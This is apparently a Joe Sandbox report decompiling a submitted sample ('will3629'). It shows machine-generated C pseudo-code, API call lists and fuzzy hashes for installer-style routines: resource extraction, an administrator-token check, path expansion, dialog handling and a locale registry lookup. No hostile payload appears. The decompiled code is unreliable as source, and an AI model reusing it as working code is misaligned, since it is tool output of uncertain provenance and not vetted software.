                                                • LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                • LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                • memcpy_s.MSVCRT ref: 00AC46E5
                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                • String ID: TITLE$lega
                                                • API String ID: 3370778649-934471404
                                                • Opcode ID: caf3ef9b7aa408d9807bde19056ef7d868de8dd5a534eb9b07b0bd90887ccab6
                                                • Instruction ID: a132ae06d53640ad921a8cad65f9eb2ff389cd8a7b616ac560e946df73969acd
                                                • Opcode Fuzzy Hash: caf3ef9b7aa408d9807bde19056ef7d868de8dd5a534eb9b07b0bd90887ccab6
                                                • Instruction Fuzzy Hash: 6901A9362442147BF31057E56C4DF7B7E2CDBDAF95F060518FA4A97150C971884287BA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E00AC17EE(intOrPtr* __ecx) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				void* _v24;
                                                				intOrPtr* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t14;
                                                				_Unknown_base(*)()* _t20;
                                                				long _t28;
                                                				void* _t35;
                                                				struct HINSTANCE__* _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                
                                                				_t14 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t14 ^ _t38;
                                                				_v12 = 0x500;
                                                				_t37 = __ecx;
                                                				_v16.Value = 0;
                                                				_v28 = __ecx;
                                                				_t28 = 0;
                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                				if(_t36 != 0) {
                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                					_v20 = _t20;
                                                					if(_t20 != 0) {
                                                						 *_t37 = 0;
                                                						_t28 = 1;
                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                							_t37 = _t39;
                                                							 *0xaca288(0, _v24, _v28);
                                                							_v20();
                                                							if(_t39 != _t39) {
                                                								asm("int 0x29");
                                                							}
                                                							FreeSid(_v24);
                                                						}
                                                					}
                                                					FreeLibrary(_t36);
                                                				}
                                                				return E00AC6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                			}



















                                                0x00ac17f6
                                                0x00ac17fd
                                                0x00ac1805
                                                0x00ac180b
                                                0x00ac180d
                                                0x00ac1815
                                                0x00ac1818
                                                0x00ac1820
                                                0x00ac1824
                                                0x00ac182c
                                                0x00ac1832
                                                0x00ac1837
                                                0x00ac1851
                                                0x00ac1854
                                                0x00ac185d
                                                0x00ac1862
                                                0x00ac186c
                                                0x00ac1872
                                                0x00ac1877
                                                0x00ac187e
                                                0x00ac187e
                                                0x00ac1883
                                                0x00ac1883
                                                0x00ac185d
                                                0x00ac188a
                                                0x00ac188a
                                                0x00ac18a2

                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00AC18DD), ref: 00AC181A
                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00AC182C
                                                • AllocateAndInitializeSid.ADVAPI32(00AC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AC18DD), ref: 00AC1855
                                                • FreeSid.ADVAPI32(?,?,?,?,00AC18DD), ref: 00AC1883
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00AC18DD), ref: 00AC188A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                • String ID: CheckTokenMembership$advapi32.dll
                                                • API String ID: 4204503880-1888249752
                                                • Opcode ID: fae29b93feafb2e7f0e2af644945720d833261ea2de75bedcc47201f530c0444
                                                • Instruction ID: 6e73f2fc56473401942d536d73287aa0ca41393066cd13d0ed6de3670ab8e503
                                                • Opcode Fuzzy Hash: fae29b93feafb2e7f0e2af644945720d833261ea2de75bedcc47201f530c0444
                                                • Instruction Fuzzy Hash: 96118E71F00209ABDB10DFA4DC49FBEBBB8FB49745F12056DFA02E2291DA308D018B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t7;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				int _t22;
                                                				struct HWND__* _t24;
                                                
                                                				_t7 = _a8 - 0x10;
                                                				if(_t7 == 0) {
                                                					EndDialog(_a4, 2);
                                                					L11:
                                                					return 1;
                                                				}
                                                				_t11 = _t7 - 0x100;
                                                				if(_t11 == 0) {
                                                					_t12 = GetDesktopWindow();
                                                					_t24 = _a4;
                                                					E00AC43D0(_t24, _t12);
                                                					SetWindowTextA(_t24, "lega");
                                                					SetDlgItemTextA(_t24, 0x838,  *0xac9404);
                                                					SetForegroundWindow(_t24);
                                                					goto L11;
                                                				}
                                                				if(_t11 == 1) {
                                                					_t22 = _a12;
                                                					if(_t22 < 6) {
                                                						goto L11;
                                                					}
                                                					if(_t22 <= 7) {
                                                						L8:
                                                						EndDialog(_a4, _t22);
                                                						return 1;
                                                					}
                                                					if(_t22 != 0x839) {
                                                						goto L11;
                                                					}
                                                					 *0xac91dc = 1;
                                                					goto L8;
                                                				}
                                                				return 0;
                                                			}








                                                0x00ac3459
                                                0x00ac345c
                                                0x00ac34d8
                                                0x00ac34de
                                                0x00000000
                                                0x00ac34e0
                                                0x00ac345e
                                                0x00ac3463
                                                0x00ac349a
                                                0x00ac34a0
                                                0x00ac34a7
                                                0x00ac34b2
                                                0x00ac34c4
                                                0x00ac34cb
                                                0x00000000
                                                0x00ac34cb
                                                0x00ac3468
                                                0x00ac346e
                                                0x00ac3474
                                                0x00000000
                                                0x00000000
                                                0x00ac347c
                                                0x00ac348c
                                                0x00ac3490
                                                0x00000000
                                                0x00ac3496
                                                0x00ac3484
                                                0x00000000
                                                0x00000000
                                                0x00ac3486
                                                0x00000000
                                                0x00ac3486
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00AC3490
                                                • GetDesktopWindow.USER32 ref: 00AC349A
                                                • SetWindowTextA.USER32(?,lega), ref: 00AC34B2
                                                • SetDlgItemTextA.USER32(?,00000838), ref: 00AC34C4
                                                • SetForegroundWindow.USER32(?), ref: 00AC34CB
                                                • EndDialog.USER32(?,00000002), ref: 00AC34D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                • String ID: lega
                                                • API String ID: 852535152-245445314
                                                • Opcode ID: 87cc6f7dcfd1dc49423c89275c4ba045ceb27eeb318cdafc3546ece01333d216
                                                • Instruction ID: 9d1850554190773cd82e9fad23356e1adfabb0168a0f1ff8b230711e2246a616
                                                • Opcode Fuzzy Hash: 87cc6f7dcfd1dc49423c89275c4ba045ceb27eeb318cdafc3546ece01333d216
                                                • Instruction Fuzzy Hash: A301B532240118ABDF1E9FA5DE0CE7E3A65EB05706F07C118F9568A5A0C7708F42D785
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E00AC2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				int _t21;
                                                				char _t32;
                                                				intOrPtr _t34;
                                                				char* _t38;
                                                				char _t42;
                                                				char* _t44;
                                                				CHAR* _t52;
                                                				intOrPtr* _t55;
                                                				CHAR* _t59;
                                                				void* _t62;
                                                				CHAR* _t64;
                                                				CHAR* _t65;
                                                				signed int _t66;
                                                
                                                				_t60 = __edx;
                                                				_t16 =  *0xac8004; // 0xc32e3ded
                                                				_t17 = _t16 ^ _t66;
                                                				_v8 = _t16 ^ _t66;
                                                				_t65 = _a4;
                                                				_t44 = __edx;
                                                				_t64 = __ecx;
                                                				if( *((char*)(__ecx)) != 0) {
                                                					GetModuleFileNameA( *0xac9a3c,  &_v268, 0x104);
                                                					while(1) {
                                                						_t17 =  *_t64;
                                                						if(_t17 == 0) {
                                                							break;
                                                						}
                                                						_t21 = IsDBCSLeadByte(_t17);
                                                						 *_t65 =  *_t64;
                                                						if(_t21 != 0) {
                                                							_t65[1] = _t64[1];
                                                						}
                                                						if( *_t64 != 0x23) {
                                                							L19:
                                                							_t65 = CharNextA(_t65);
                                                						} else {
                                                							_t64 = CharNextA(_t64);
                                                							if(CharUpperA( *_t64) != 0x44) {
                                                								if(CharUpperA( *_t64) != 0x45) {
                                                									if( *_t64 == 0x23) {
                                                										goto L19;
                                                									}
                                                								} else {
                                                									E00AC1680(_t65, E00AC17C8(_t44, _t65),  &_v268);
                                                									_t52 = _t65;
                                                									_t14 =  &(_t52[1]); // 0x2
                                                									_t60 = _t14;
                                                									do {
                                                										_t32 =  *_t52;
                                                										_t52 =  &(_t52[1]);
                                                									} while (_t32 != 0);
                                                									goto L17;
                                                								}
                                                							} else {
                                                								E00AC65E8( &_v268);
                                                								_t55 =  &_v268;
                                                								_t62 = _t55 + 1;
                                                								do {
                                                									_t34 =  *_t55;
                                                									_t55 = _t55 + 1;
                                                								} while (_t34 != 0);
                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                									 *_t38 = 0;
                                                								}
                                                								E00AC1680(_t65, E00AC17C8(_t44, _t65),  &_v268);
                                                								_t59 = _t65;
                                                								_t12 =  &(_t59[1]); // 0x2
                                                								_t60 = _t12;
                                                								do {
                                                									_t42 =  *_t59;
                                                									_t59 =  &(_t59[1]);
                                                								} while (_t42 != 0);
                                                								L17:
                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                							}
                                                						}
                                                						_t64 = CharNextA(_t64);
                                                					}
                                                					 *_t65 = _t17;
                                                				}
                                                				return E00AC6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                			}






















                                                0x00ac2aac
                                                0x00ac2ab7
                                                0x00ac2abc
                                                0x00ac2abe
                                                0x00ac2ac3
                                                0x00ac2ac6
                                                0x00ac2ac9
                                                0x00ac2ace
                                                0x00ac2ae6
                                                0x00ac2bdc
                                                0x00ac2bdc
                                                0x00ac2be0
                                                0x00000000
                                                0x00000000
                                                0x00ac2af2
                                                0x00ac2afc
                                                0x00ac2b00
                                                0x00ac2b05
                                                0x00ac2b05
                                                0x00ac2b0b
                                                0x00ac2bca
                                                0x00ac2bd1
                                                0x00ac2b11
                                                0x00ac2b18
                                                0x00ac2b26
                                                0x00ac2b99
                                                0x00ac2bc8
                                                0x00000000
                                                0x00000000
                                                0x00ac2b9b
                                                0x00ac2bae
                                                0x00ac2bb3
                                                0x00ac2bb5
                                                0x00ac2bb5
                                                0x00ac2bb8
                                                0x00ac2bb8
                                                0x00ac2bba
                                                0x00ac2bbb
                                                0x00000000
                                                0x00ac2bb8
                                                0x00ac2b28
                                                0x00ac2b2e
                                                0x00ac2b33
                                                0x00ac2b39
                                                0x00ac2b3c
                                                0x00ac2b3c
                                                0x00ac2b3e
                                                0x00ac2b3f
                                                0x00ac2b55
                                                0x00ac2b5d
                                                0x00ac2b64
                                                0x00ac2b64
                                                0x00ac2b7a
                                                0x00ac2b7f
                                                0x00ac2b81
                                                0x00ac2b81
                                                0x00ac2b84
                                                0x00ac2b84
                                                0x00ac2b86
                                                0x00ac2b87
                                                0x00ac2bbf
                                                0x00ac2bc1
                                                0x00ac2bc1
                                                0x00ac2b26
                                                0x00ac2bda
                                                0x00ac2bda
                                                0x00ac2be6
                                                0x00ac2be6
                                                0x00ac2bf8

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00AC2AE6
                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00AC2AF2
                                                • CharNextA.USER32(?), ref: 00AC2B12
                                                • CharUpperA.USER32 ref: 00AC2B1E
                                                • CharPrevA.USER32(?,?), ref: 00AC2B55
                                                • CharNextA.USER32(?), ref: 00AC2BD4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                • String ID:
                                                • API String ID: 571164536-0
                                                • Opcode ID: 2af977c1b0b24d463dc60e3e718286d7e0c19bf36c8557846c559ebd8acfbc63
                                                • Instruction ID: 36bbb8fb39f54a1c6c67f2f4884b02744e9c657f63f9dd633039d9448df436a9
                                                • Opcode Fuzzy Hash: 2af977c1b0b24d463dc60e3e718286d7e0c19bf36c8557846c559ebd8acfbc63
                                                • Instruction Fuzzy Hash: F24103346082495EDB159F348C54FFE7BA99F56304F1A419EE8C287202DB358E87CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00AC43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                				signed int _v8;
                                                				struct tagRECT _v24;
                                                				struct tagRECT _v40;
                                                				struct HWND__* _v44;
                                                				intOrPtr _v48;
                                                				int _v52;
                                                				intOrPtr _v56;
                                                				int _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				void* _t53;
                                                				intOrPtr _t56;
                                                				int _t59;
                                                				struct HWND__* _t63;
                                                				struct HWND__* _t67;
                                                				struct HWND__* _t68;
                                                				struct HDC__* _t69;
                                                				int _t72;
                                                				signed int _t74;
                                                
                                                				_t63 = __edx;
                                                				_t29 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t29 ^ _t74;
                                                				_t68 = __edx;
                                                				_v44 = __ecx;
                                                				GetWindowRect(__ecx,  &_v40);
                                                				_t53 = _v40.bottom - _v40.top;
                                                				_v48 = _v40.right - _v40.left;
                                                				GetWindowRect(_t68,  &_v24);
                                                				_v56 = _v24.bottom - _v24.top;
                                                				_t69 = GetDC(_v44);
                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                				ReleaseDC(_v44, _t69);
                                                				_t56 = _v48;
                                                				asm("cdq");
                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                				_t67 = 0;
                                                				if(_t72 >= 0) {
                                                					_t63 = _v52;
                                                					if(_t72 + _t56 > _t63) {
                                                						_t72 = _t63 - _t56;
                                                					}
                                                				} else {
                                                					_t72 = _t67;
                                                				}
                                                				asm("cdq");
                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                				if(_t59 >= 0) {
                                                					_t63 = _v60;
                                                					if(_t59 + _t53 > _t63) {
                                                						_t59 = _t63 - _t53;
                                                					}
                                                				} else {
                                                					_t59 = _t67;
                                                				}
                                                				return E00AC6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                			}
























                                                0x00ac43d0
                                                0x00ac43d8
                                                0x00ac43df
                                                0x00ac43e6
                                                0x00ac43ec
                                                0x00ac43f1
                                                0x00ac4400
                                                0x00ac4403
                                                0x00ac440b
                                                0x00ac4420
                                                0x00ac4429
                                                0x00ac4437
                                                0x00ac4444
                                                0x00ac4447
                                                0x00ac444d
                                                0x00ac4454
                                                0x00ac445b
                                                0x00ac4460
                                                0x00ac4461
                                                0x00ac4467
                                                0x00ac446f
                                                0x00ac4473
                                                0x00ac4473
                                                0x00ac4463
                                                0x00ac4463
                                                0x00ac4463
                                                0x00ac447a
                                                0x00ac4481
                                                0x00ac4484
                                                0x00ac448a
                                                0x00ac4492
                                                0x00ac4496
                                                0x00ac4496
                                                0x00ac4486
                                                0x00ac4486
                                                0x00ac4486
                                                0x00ac44b8

                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00AC43F1
                                                • GetWindowRect.USER32(00000000,?), ref: 00AC440B
                                                • GetDC.USER32(?), ref: 00AC4423
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00AC442E
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00AC443A
                                                • ReleaseDC.USER32(?,00000000), ref: 00AC4447
                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00AC44A2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceRect$Release
                                                • String ID:
                                                • API String ID: 2212493051-0
                                                • Opcode ID: fbfc46b2293117097bd024fa3da409b779f473e050d6ac9f40349840029da428
                                                • Instruction ID: c4692d390c76c751b3012fe8eb5c8201d5b77240b012d9943e06df53b2ee0102
                                                • Opcode Fuzzy Hash: fbfc46b2293117097bd024fa3da409b779f473e050d6ac9f40349840029da428
                                                • Instruction Fuzzy Hash: B9311E72E00119AFCB14CFF8DD49DEEBBB5EB99314F164269E805B3250DA306D058B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00AC6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                				signed int _v8;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				struct HINSTANCE__* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				struct HRSRC__* _t21;
                                                				intOrPtr _t26;
                                                				void* _t30;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr* _t40;
                                                				void* _t41;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				struct HINSTANCE__* _t51;
                                                
                                                				_t44 = __edx;
                                                				_t16 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t16 ^ _t50;
                                                				_t46 = 0;
                                                				_v32 = __ecx;
                                                				_v36 = 0;
                                                				_t36 = 1;
                                                				E00AC171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                				while(1) {
                                                					_t51 = _t51 + 0x10;
                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                					if(_t21 == 0) {
                                                						break;
                                                					}
                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                					if(_t45 == 0) {
                                                						 *0xac9124 = 0x80070714;
                                                						_t36 = _t46;
                                                					} else {
                                                						_t5 = _t45 + 8; // 0x8
                                                						_t44 = _t5;
                                                						_t40 = _t44;
                                                						_t6 = _t40 + 1; // 0x9
                                                						_t47 = _t6;
                                                						do {
                                                							_t26 =  *_t40;
                                                							_t40 = _t40 + 1;
                                                						} while (_t26 != 0);
                                                						_t41 = _t40 - _t47;
                                                						_t46 = _t51;
                                                						_t7 = _t41 + 1; // 0xa
                                                						 *0xaca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                						_t30 = _v32();
                                                						if(_t51 != _t51) {
                                                							asm("int 0x29");
                                                						}
                                                						_push(_t45);
                                                						if(_t30 == 0) {
                                                							_t36 = 0;
                                                							FreeResource(??);
                                                						} else {
                                                							FreeResource();
                                                							_v36 = _v36 + 1;
                                                							E00AC171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                							_t46 = 0;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					return E00AC6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                				}
                                                				goto L12;
                                                			}






















                                                0x00ac6298
                                                0x00ac62a0
                                                0x00ac62a7
                                                0x00ac62ad
                                                0x00ac62af
                                                0x00ac62bb
                                                0x00ac62c3
                                                0x00ac62c4
                                                0x00ac633b
                                                0x00ac633b
                                                0x00ac6345
                                                0x00ac634d
                                                0x00000000
                                                0x00000000
                                                0x00ac62da
                                                0x00ac62de
                                                0x00ac635f
                                                0x00ac6369
                                                0x00ac62e0
                                                0x00ac62e0
                                                0x00ac62e0
                                                0x00ac62e3
                                                0x00ac62e5
                                                0x00ac62e5
                                                0x00ac62e8
                                                0x00ac62e8
                                                0x00ac62ea
                                                0x00ac62eb
                                                0x00ac62ef
                                                0x00ac62f1
                                                0x00ac62f3
                                                0x00ac6302
                                                0x00ac6308
                                                0x00ac630d
                                                0x00ac6314
                                                0x00ac6314
                                                0x00ac6316
                                                0x00ac6319
                                                0x00ac6355
                                                0x00ac6357
                                                0x00ac631b
                                                0x00ac631b
                                                0x00ac6331
                                                0x00ac6334
                                                0x00ac6339
                                                0x00000000
                                                0x00ac6339
                                                0x00ac6319
                                                0x00ac636b
                                                0x00ac637d
                                                0x00ac637d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC62CD
                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC62D4
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC631B
                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00AC6345
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC6357
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                • String ID: UPDFILE%lu
                                                • API String ID: 2922116661-2329316264
                                                • Opcode ID: 57489fa665cdb024fb43770649b289f3052c37f8524e9518c2e75f30d7ee4336
                                                • Instruction ID: c61e657d7384c015b86c8bddbef0d86b745c5c31917cc855acd17afdfc955f2b
                                                • Opcode Fuzzy Hash: 57489fa665cdb024fb43770649b289f3052c37f8524e9518c2e75f30d7ee4336
                                                • Instruction Fuzzy Hash: 4A21D375A00219ABDB10DFA49C49EFFBB78FB49714B16022DF902A7241DB359D068BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00AC681F(void* __ebx) {
                                                				signed int _v8;
                                                				char _v20;
                                                				struct _OSVERSIONINFOA _v168;
                                                				void* _v172;
                                                				int* _v176;
                                                				int _v180;
                                                				int _v184;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				long _t31;
                                                				signed int _t35;
                                                				void* _t36;
                                                				intOrPtr _t41;
                                                				signed int _t44;
                                                
                                                				_t36 = __ebx;
                                                				_t19 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t19 ^ _t44;
                                                				_t41 =  *0xac81d8; // 0x0
                                                				_t43 = 0;
                                                				_v180 = 0xc;
                                                				_v176 = 0;
                                                				if(_t41 == 0xfffffffe) {
                                                					 *0xac81d8 = 0;
                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                					if(GetVersionExA( &_v168) == 0) {
                                                						L12:
                                                						_t41 =  *0xac81d8; // 0x0
                                                					} else {
                                                						_t41 = 1;
                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t31 = RegQueryValueExA(_v172, 0xac1140, 0,  &_v184,  &_v20,  &_v180);
                                                							_t43 = _t31;
                                                							RegCloseKey(_v172);
                                                							if(_t31 != 0) {
                                                								goto L12;
                                                							} else {
                                                								_t40 =  &_v176;
                                                								if(E00AC66F9( &_v20,  &_v176) == 0) {
                                                									goto L12;
                                                								} else {
                                                									_t35 = _v176 & 0x000003ff;
                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                										 *0xac81d8 = _t41;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E00AC6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                			}


















                                                0x00ac681f
                                                0x00ac682a
                                                0x00ac6831
                                                0x00ac6836
                                                0x00ac683c
                                                0x00ac683e
                                                0x00ac6848
                                                0x00ac6851
                                                0x00ac685d
                                                0x00ac6864
                                                0x00ac6876
                                                0x00ac693a
                                                0x00ac693a
                                                0x00ac687c
                                                0x00ac687e
                                                0x00ac6885
                                                0x00000000
                                                0x00ac68d6
                                                0x00ac68f4
                                                0x00ac6900
                                                0x00ac6902
                                                0x00ac690a
                                                0x00000000
                                                0x00ac690c
                                                0x00ac690c
                                                0x00ac691c
                                                0x00000000
                                                0x00ac691e
                                                0x00ac6924
                                                0x00ac692b
                                                0x00ac6932
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac692b
                                                0x00ac691c
                                                0x00ac690a
                                                0x00ac6885
                                                0x00ac6876
                                                0x00ac6951

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00AC686E
                                                • GetSystemMetrics.USER32(0000004A), ref: 00AC68A7
                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00AC68CC
                                                • RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,?,0000000C), ref: 00AC68F4
